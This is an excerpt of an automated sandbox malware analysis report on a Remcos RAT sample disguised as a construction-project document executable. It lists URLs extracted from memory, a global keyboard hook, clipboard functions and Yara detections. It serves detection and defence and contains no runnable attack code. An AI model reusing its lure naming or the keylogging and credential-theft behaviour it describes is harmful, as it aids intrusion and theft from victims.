              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000002.2967580790.0000000033280000.00000040.10000000.00040000.00000000.sdmp, Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000007.00000002.2205246174.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000002.2967580790.0000000033280000.00000040.10000000.00040000.00000000.sdmp, Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000007.00000002.2205246174.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000007.00000003.2205049456.000000000067D000.00000004.00000020.00020000.00000000.sdmp, Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000007.00000003.2205077069.000000000067D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comta
              Source: bhv4333.tmp.5.drString found in binary or memory: http://www.msftconnecttest.com/connecttest.txt?n=1696334965379
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000005.00000002.2221230831.0000000000193000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000007.00000002.2205246174.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeString found in binary or memory: http://www.skinstudio.netG
              Source: bhv4333.tmp.5.drString found in binary or memory: https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?18b635b804a8d6ad0a1fa437
              Source: bhv4333.tmp.5.drString found in binary or memory: https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?c9b5e9d2b836931c8ddd4e8d
              Source: bhv4333.tmp.5.drString found in binary or memory: https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?1c89d9658c6af83a02d98b03
              Source: bhv4333.tmp.5.drString found in binary or memory: https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?74b620657ac570f7999e6ad7
              Source: bhv4333.tmp.5.drString found in binary or memory: https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?cf2d8bf3b68a3e37eef992d5
              Source: bhv4333.tmp.5.drString found in binary or memory: https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?fc66b8a78ab7a1394f56e742
              Source: bhv4333.tmp.5.drString found in binary or memory: https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?66601c3b572f284b9da07fcc
              Source: bhv4333.tmp.5.drString found in binary or memory: https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?f67d919da1a9ba8a5672367d
              Source: bhv4333.tmp.5.drString found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=W
              Source: bhv4333.tmp.5.drString found in binary or memory: https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?467894188c5d788807342326
              Source: bhv4333.tmp.5.drString found in binary or memory: https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?a176b93f037f93b5720edf68
              Source: bhv4333.tmp.5.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
              Source: bhv4333.tmp.5.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
              Source: bhv4333.tmp.5.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
              Source: bhv4333.tmp.5.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
              Source: bhv4333.tmp.5.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
              Source: bhv4333.tmp.5.drString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
              Source: bhv4333.tmp.5.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
              Source: bhv4333.tmp.5.drString found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
              Source: bhv4333.tmp.5.drString found in binary or memory: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpX
              Source: bhv4333.tmp.5.drString found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
              Source: bhv4333.tmp.5.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
              Source: bhv4333.tmp.5.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BL2r8e&Fr
              Source: bhv4333.tmp.5.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BLUr5a&Fr
              Source: bhv4333.tmp.5.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-BL2r8e&FrontEnd=AFD
              Source: bhv4333.tmp.5.drString found in binary or memory: https://fp-afd-nocache-ccp.azureedge.net/apc/trans.gif?99bdaa7641aea1439604d0afe8971477
              Source: bhv4333.tmp.5.drString found in binary or memory: https://fp-afd-nocache-ccp.azureedge.net/apc/trans.gif?bc7d158a1b0c0bcddb88a222b6122bda
              Source: bhv4333.tmp.5.drString found in binary or memory: https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?60caefc8ca640843bccad421cfaadcc8
              Source: bhv4333.tmp.5.drString found in binary or memory: https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?a9bddedb22fa9ee1d455a5d5a89b950c
              Source: bhv4333.tmp.5.drString found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?4be9f57fdbd89d63c136fa90032d1d91
              Source: bhv4333.tmp.5.drString found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?e5772e13592c9d33c9159aed24f891a7
              Source: bhv4333.tmp.5.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?a6aceac28fb5ae421a73cab7cdd76bd8
              Source: bhv4333.tmp.5.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?b57fe5cd49060a950d25a1d237496815
              Source: bhv4333.tmp.5.drString found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?2f6c563d6db8702d4f61cfc28e14d6ba
              Source: bhv4333.tmp.5.drString found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?3dacce210479f0b4d47ed33c21160712
              Source: bhv4333.tmp.5.drString found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?7e0e9c3a9f02f17275e789accf11532b
              Source: bhv4333.tmp.5.drString found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?81f59f7d566abbd2077a5b6cdfd04c7b
              Source: bhv4333.tmp.5.drString found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?3c5bdbf226e2549812723f51b8fe2023
              Source: bhv4333.tmp.5.drString found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?c50299ad5b45bb3d4c7a57024998a291
              Source: bhv4333.tmp.5.drString found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
              Source: bhv4333.tmp.5.drString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
              Source: bhv4333.tmp.5.drString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000005.00000003.2220871776.000000000062D000.00000004.00000020.00020000.00000000.sdmp, Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000005.00000003.2220824366.000000000062D000.00000004.00000020.00020000.00000000.sdmp, Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000005.00000002.2221660985.000000000062D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.liv
              Source: bhv4333.tmp.5.drString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: bhv4333.tmp.5.drString found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3
              Source: bhv4333.tmp.5.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3-4102-ae
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeString found in binary or memory: https://login.yahoo.com/config/login
              Source: bhv4333.tmp.5.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
              Source: bhv4333.tmp.5.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_sKiljltKC1Ne_Y3fl1HuHQ2.css
              Source: bhv4333.tmp.5.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_BxKM4IRLudkIao5qo
              Source: bhv4333.tmp.5.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
              Source: bhv4333.tmp.5.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_AI1nyU_u3YQ_at1fSBm4Uw2.js
              Source: bhv4333.tmp.5.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
              Source: bhv4333.tmp.5.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
              Source: bhv4333.tmp.5.drString found in binary or memory: https://maps.windows.com/windows-app-web-link
              Source: bhv4333.tmp.5.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
              Source: bhv4333.tmp.5.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=27ff908e89d7b6264fde
              Source: bhv4333.tmp.5.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=586ba6
              Source: bhv4333.tmp.5.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=7ccb04
              Source: bhv4333.tmp.5.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=b1ed69
              Source: bhv4333.tmp.5.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?17a81fd4cdc7fc73a2b4cf5b67ff816d
              Source: bhv4333.tmp.5.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?29331761644ba41ebf9abf96ecc6fbad
              Source: bhv4333.tmp.5.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?2f153f40414852a5ead98f4103d563a8
              Source: bhv4333.tmp.5.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?a50e32ebd978eda4d21928b1dbc78135
              Source: bhv4333.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
              Source: bhv4333.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
              Source: bhv4333.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
              Source: bhv4333.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
              Source: bhv4333.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
              Source: bhv4333.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-0debb885be07c402c948.js
              Source: bhv4333.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
              Source: bhv4333.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ec3581b6c9e6e9985aa7.chunk.v7.js
              Source: bhv4333.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
              Source: bhv4333.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.6c288f9aff9797959103.chunk.v7.js
              Source: bhv4333.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.9ba2d4c9e339ba497e10.chunk.v7.js
              Source: bhv4333.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-1652fd8b358d589e6ec0.js
              Source: bhv4333.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.52c45571d19ede0a7005.chunk.v7.j
              Source: bhv4333.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.d918c7fc33e22b41b936.chunk.v7.c
              Source: bhv4333.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
              Source: bhv4333.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
              Source: bhv4333.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
              Source: bhv4333.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
              Source: bhv4333.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
              Source: bhv4333.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
              Source: bhv4333.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
              Source: bhv4333.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
              Source: bhv4333.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
              Source: bhv4333.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
              Source: bhv4333.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
              Source: bhv4333.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
              Source: bhv4333.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
              Source: bhv4333.tmp.5.drString found in binary or memory: https://rum8.perf.linkedin.com/apc/trans.gif?690daf9375f3d267a5b7b08fbc174993
              Source: bhv4333.tmp.5.drString found in binary or memory: https://rum8.perf.linkedin.com/apc/trans.gif?fe61b216ccbcc1bca02cb20f2e94fb51
              Source: bhv4333.tmp.5.drString found in binary or memory: https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?909b77fc750668f20e07288ff0ed43e2
              Source: bhv4333.tmp.5.drString found in binary or memory: https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?c6931b9e725f95cf9c20849dd6498c59
              Source: bhv4333.tmp.5.drString found in binary or memory: https://www.digicert.com/CPS0
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000007.00000002.2205246174.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
              Source: bhv4333.tmp.5.drString found in binary or memory: https://www.office.com/

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Installs a global keyboard hook
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 0_2_00405373 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,LdrInitializeThunk,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,LdrInitializeThunk,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,LdrInitializeThunk,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405373
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 5_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,5_2_0040987A
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 5_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,5_2_004098E2
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 6_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,6_2_00406DFC
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 6_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,6_2_00406E9F
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 7_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,7_2_004068B5
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 7_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,7_2_004072B5

              E-Banking Fraud

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000004.00000002.2943881499.000000000246B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2942457183.000000000019F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2943881499.0000000002452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe PID: 7864, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 5_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,5_2_0040DD85
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 5_2_00401806 NtdllDefWindowProc_W,5_2_00401806
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 5_2_004018C0 NtdllDefWindowProc_W,5_2_004018C0
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 6_2_004016FD NtdllDefWindowProc_A,6_2_004016FD
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 6_2_004017B7 NtdllDefWindowProc_A,6_2_004017B7
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 7_2_00402CAC NtdllDefWindowProc_A,7_2_00402CAC
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 7_2_00402D66 NtdllDefWindowProc_A,7_2_00402D66
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 0_2_0040335A EntryPoint,LdrInitializeThunk,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,LdrInitializeThunk,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,ExitProcess,0_2_0040335A
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 4_2_0040335A EntryPoint,LdrInitializeThunk,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,LdrInitializeThunk,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,ExitProcess,4_2_0040335A
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 0_2_004065E10_2_004065E1
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 0_2_00404BB00_2_00404BB0
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 4_2_004065E14_2_004065E1
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 4_2_00404BB04_2_00404BB0
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 4_2_332BB5C14_2_332BB5C1
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 5_2_0044B0405_2_0044B040
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 5_2_0043610D5_2_0043610D
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 5_2_004473105_2_00447310
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 5_2_0044A4905_2_0044A490
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 5_2_0040755A5_2_0040755A
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 5_2_0043C5605_2_0043C560
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 5_2_0044B6105_2_0044B610
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 5_2_0044D6C05_2_0044D6C0
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 5_2_004476F05_2_004476F0
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 5_2_0044B8705_2_0044B870
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 5_2_0044081D5_2_0044081D
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 5_2_004149575_2_00414957
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 5_2_004079EE5_2_004079EE
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 5_2_00407AEB5_2_00407AEB
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 5_2_0044AA805_2_0044AA80
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 5_2_00412AA95_2_00412AA9
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 5_2_00404B745_2_00404B74
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 5_2_00404B035_2_00404B03
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 5_2_0044BBD85_2_0044BBD8
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 5_2_00404BE55_2_00404BE5
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 5_2_00404C765_2_00404C76
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 5_2_00415CFE5_2_00415CFE
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 5_2_00416D725_2_00416D72
